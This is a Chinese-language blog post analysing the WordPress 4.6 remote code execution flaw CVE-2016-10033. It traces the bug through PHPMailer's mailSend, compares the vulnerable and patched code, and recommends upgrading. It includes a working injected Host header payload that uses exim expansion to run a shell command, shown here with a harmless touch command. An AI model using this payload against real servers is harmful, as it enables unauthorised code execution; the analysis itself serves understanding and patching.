<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="Manning23"><title>WordPress 4.6版本远程代码执行漏洞 · Manning23</title><meta name="description" content="0x00 漏洞概述WordPress 4.6 版本远程代码执行漏洞是一个非常严重的漏洞，未经授权的攻击者利用该漏洞就能实现远程代码执行，针对目标服务器实现即时访问，最终导致目标应用服务器的完全陷落。无需插件或者非标准设置，就能利用该漏洞。Dawid Golunski (@dawid_golunski"><meta name="keywords"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="short icon" href="/images/favicon.png" type="image/x-icon"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"></head><body><div class="sidebar animated fadeInDown"><div class="logo-title"><div class="title"><img src="/images/logo@2x.png" style="width:127px;"><h3 title=""><a href="/">Manning23</a></h3><div class="description"><p>Technology &amp; Life</p></div></div></div><ul class="social-links"><li><a href="http://weibo.com/2077484845"><i class="fa fa-weibo"></i></a></li></ul><div class="footer"><a target="_blank" href="/"><span>Theme by </span></a><a href="https://www.caicai.me"> CaiCai </a><span>&</span><a href="https://github.com/Ben02/hexo-theme-Anatole"> Ben</a><div class="by_farbox"><a href="https://hexo.io/zh-cn/" target="_blank">Proudly published with Hexo&#65281;</a></div></div></div><div class="main"><div class="page-top animated fadeInDown"><div class="nav"><li><a href="/">首页</a></li><li><a href="/about">关于</a></li><li><a href="/archives">归档</a></li></div><div class="information"><div class="back_btn"><li><a onclick="window.history.go(-1)" class="fa fa-chevron-left"> </a></li></div><div class="avatar"><img src="/images/avatar.png"></div></div></div><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>WordPress 4.6版本远程代码执行漏洞</a></h3></div><div class="post-content"><h2 id="0x00-漏洞概述"><a href="#0x00-漏洞概述" class="headerlink" title="0x00 漏洞概述"></a>0x00 漏洞概述</h2><p>WordPress 4.6 版本远程代码执行漏洞是一个非常严重的漏洞，未经授权的攻击者利用该漏洞就能实现远程代码执行，针对目标服务器实现即时访问，最终导致目标应用服务器的完全陷落。无需插件或者非标准设置，就能利用该漏洞。Dawid Golunski (@dawid_golunski) 还在poc中为我们展示了精彩的替换 ／ 和 “ ”(表示空格)的技巧。</p>
<h2 id="0x01-漏洞分析"><a href="#0x01-漏洞分析" class="headerlink" title="0x01 漏洞分析"></a>0x01 漏洞分析</h2><p>整个过程利用了 WordPress 未对请求的 Host 字段进行校验和 PHPMailer 在 小于 5.2.20 版本存在的代码执行漏洞。对以上两个不安全点进行利用，导致远程代码执行。</p>
<p>POC地址为 <a href="https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html" target="_blank" rel="external">WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033</a></p>
<p>我们测试的命令为</p>
<pre><code>/usr/bin/touch /tmp/manning.test
</code></pre><p>我们看下POC发出的请求</p>
<p><img src="/2017/05/05/WordPress-4-6版本远程代码执行漏洞/p1.png" width="80%"></p>
<p>Host 字段构造如下</p>
<pre><code>Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}manning.test}} null)
</code></pre><p>这点跟我们认知中的Host完全不一样。</p>
<p>接下来的流程非常简单。</p>
<p>在 wp-login.php 中，首先根据请求中的 action 进行路由</p>
<p><img src="/2017/05/05/WordPress-4-6版本远程代码执行漏洞/p2.png" width="80%"></p>
<p>接着进入函数 retrieve_password</p>
<p><img src="/2017/05/05/WordPress-4-6版本远程代码执行漏洞/p3.png" width="80%"></p>
<p>接着进入 wp_mail 函数，位于文件 pluggable.php</p>
<p><img src="/2017/05/05/WordPress-4-6版本远程代码执行漏洞/p4.png" width="80%"></p>
<p>在 wp_mail 中，WordPress 会把 _SERVER[‘SERVER_NAME’] 变量拼接到 from_email 变量中。</p>
<p><img src="/2017/05/05/WordPress-4-6版本远程代码执行漏洞/p5.png" width="80%"></p>
<p>经过一系列的邮件内容拼接，把类对象 phpmailer 的类变量都进行了赋值，之后进入调用了 Send 函数</p>
<p><img src="/2017/05/05/WordPress-4-6版本远程代码执行漏洞/p6.png" width="80%"></p>
<p>这里把最关键的 mailSend 函数贴出来，mailSend 函数负责最终调用，关键在 mailPassthru 函数，该函数会把带有恶意的 params 变量交给 PHPMailer。</p>
<pre><code>protected function mailSend($header, $body)
{
    $toArr = array();
    foreach ($this-&gt;to as $toaddr) {
        $toArr[] = $this-&gt;addrFormat($toaddr);
    }
    $to = implode(&apos;, &apos;, $toArr);

    if (empty($this-&gt;Sender)) {
        $params = &apos; &apos;;
    } else {
        $params = sprintf(&apos;-f%s&apos;, $this-&gt;Sender);
    }
    if ($this-&gt;Sender != &apos;&apos; and !ini_get(&apos;safe_mode&apos;)) {
        $old_from = ini_get(&apos;sendmail_from&apos;);
        ini_set(&apos;sendmail_from&apos;, $this-&gt;Sender);
    }
    $result = false;
    if ($this-&gt;SingleTo &amp;&amp; count($toArr) &gt; 1) {
        foreach ($toArr as $toAddr) {
            $result = $this-&gt;mailPassthru($toAddr, $this-&gt;Subject, $body, $header, $params);
            $this-&gt;doCallback($result, array($toAddr), $this-&gt;cc, $this-&gt;bcc, $this-&gt;Subject, $body, $this-&gt;From);
        }
    } else {
        $result = $this-&gt;mailPassthru($to, $this-&gt;Subject, $body, $header, $params);
        $this-&gt;doCallback($result, $this-&gt;to, $this-&gt;cc, $this-&gt;bcc, $this-&gt;Subject, $body, $this-&gt;From);
    }
    if (isset($old_from)) {
        ini_set(&apos;sendmail_from&apos;, $old_from);
    }
    if (!$result) {
        throw new phpmailerException($this-&gt;lang(&apos;instantiate&apos;), self::STOP_CRITICAL);
    }
    return true;
}
</code></pre><p>动态调试，在 mailPassthru 调用时，整个变量如图所示。</p>
<p><img src="/2017/05/05/WordPress-4-6版本远程代码执行漏洞/p7.png" width="80%"></p>
<p>最终在 mailPassthru 内调用了 @mail。</p>
<p><img src="/2017/05/05/WordPress-4-6版本远程代码执行漏洞/p8.png" width="80%"></p>
<p>最终我们在 tmp 目录看到了 manning.test 文件</p>
<p><img src="/2017/05/05/WordPress-4-6版本远程代码执行漏洞/p9.png" width="80%"></p>
<h2 id="0x02-补丁分析"><a href="#0x02-补丁分析" class="headerlink" title="0x02 补丁分析"></a>0x02 补丁分析</h2><p>WordPress 4.7.1 版本</p>
<p>1，升级phpmailer的版本到5.2.22</p>
<p>2，在 mailSend 修改，对变量 params 进行了过滤。</p>
<pre><code>protected function mailSend($header, $body)
{
    $toArr = array();
    foreach ($this-&gt;to as $toaddr) {
        $toArr[] = $this-&gt;addrFormat($toaddr);
    }
    $to = implode(&apos;, &apos;, $toArr);

    $params = null;
    //This sets the SMTP envelope sender which gets turned into a return-path header by the receiver
    if (!empty($this-&gt;Sender) and $this-&gt;validateAddress($this-&gt;Sender)) {
        // CVE-2016-10033, CVE-2016-10045: Don&apos;t pass -f if characters will be escaped.
        if (self::isShellSafe($this-&gt;Sender)) {
            $params = sprintf(&apos;-f%s&apos;, $this-&gt;Sender);
        }
    }
    if (!empty($this-&gt;Sender) and !ini_get(&apos;safe_mode&apos;) and $this-&gt;validateAddress($this-&gt;Sender)) {
        $old_from = ini_get(&apos;sendmail_from&apos;);
        ini_set(&apos;sendmail_from&apos;, $this-&gt;Sender);
    }
    $result = false;
    if ($this-&gt;SingleTo and count($toArr) &gt; 1) {
        foreach ($toArr as $toAddr) {
            $result = $this-&gt;mailPassthru($toAddr, $this-&gt;Subject, $body, $header, $params);
            $this-&gt;doCallback($result, array($toAddr), $this-&gt;cc, $this-&gt;bcc, $this-&gt;Subject, $body, $this-&gt;From);
        }
    } else {
        $result = $this-&gt;mailPassthru($to, $this-&gt;Subject, $body, $header, $params);
        $this-&gt;doCallback($result, $this-&gt;to, $this-&gt;cc, $this-&gt;bcc, $this-&gt;Subject, $body, $this-&gt;From);
    }
    if (isset($old_from)) {
        ini_set(&apos;sendmail_from&apos;, $old_from);
    }
    if (!$result) {
        throw new phpmailerException($this-&gt;lang(&apos;instantiate&apos;), self::STOP_CRITICAL);
    }
    return true;
}
</code></pre><h2 id="0x03-防护建议"><a href="#0x03-防护建议" class="headerlink" title="0x03 防护建议"></a>0x03 防护建议</h2><p>升级 WordPress 至最新版本。</p>
<h2 id="0x04-调试总结"><a href="#0x04-调试总结" class="headerlink" title="0x04 调试总结"></a>0x04 调试总结</h2><p>调试过程中需要注意：</p>
<ul>
<li>sendmail 需要装 exim4扩展</li>
<li>需要更改poc中的账户，poc中填写的是admin</li>
<li>poc运行环境需要有python环境</li>
</ul>
<p>本次调试环境是：</p>
<ul>
<li>Server version: Apache/2.4.18 (Ubuntu)</li>
<li>PHP 7.0.15-0ubuntu0.16.04.4 (cli) ( NTS )</li>
<li>sendmail 和 exim4扩展</li>
</ul>
<p>其他注意事项可以参考 @Tomato菜的要死 和 @廖新喜1 的微博。</p>
<h2 id="0x05-参考文章"><a href="#0x05-参考文章" class="headerlink" title="0x05 参考文章"></a>0x05 参考文章</h2><ul>
<li><a href="https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html" target="_blank" rel="external">https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html</a></li>
</ul>
</div><div class="post-footer"><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2017-05-05</span><i class="fa fa-tag"></i></div></div></div></div><div class="share"><div class="evernote"><a href="javascript:(function(){EN_CLIP_HOST='http://www.evernote.com';try{var%20x=document.createElement('SCRIPT');x.type='text/javascript';x.src=EN_CLIP_HOST+'/public/bookmarkClipper.js?'+(new%20Date().getTime()/100000);document.getElementsByTagName('head')[0].appendChild(x);}catch(e){location.href=EN_CLIP_HOST+'/clip.action?url='+encodeURIComponent(location.href)+'&amp;title='+encodeURIComponent(document.title);}})();" ref="nofollow" target="_blank" class="fa fa-bookmark"></a></div><div class="weibo"><a href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));" class="fa fa-weibo"></a></div><div class="twitter"><a href="http://twitter.com/home?status=,http://yoursite.com/2017/05/05/WordPress-4-6版本远程代码执行漏洞/,Manning23,WordPress 4.6版本远程代码执行漏洞,;" class="fa fa-twitter"></a></div></div><div class="pagination"><ul class="clearfix"><li class="pre pagbuttons"><a role="navigation" href="/2017/06/13/Spring-Web-Flow-RCE漏洞分析/" title="Spring Web Flow RCE漏洞分析" class="btn">上一篇</a></li><li class="next pagbuttons"><a role="navigation" href="/2017/03/21/Struts2-S046命令执行漏洞/" title="Struts2 S046命令执行漏洞" class="btn">下一篇</a></li></ul></div></div></div></div></div><script src="/js/jquery.js"></script><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script></body></html>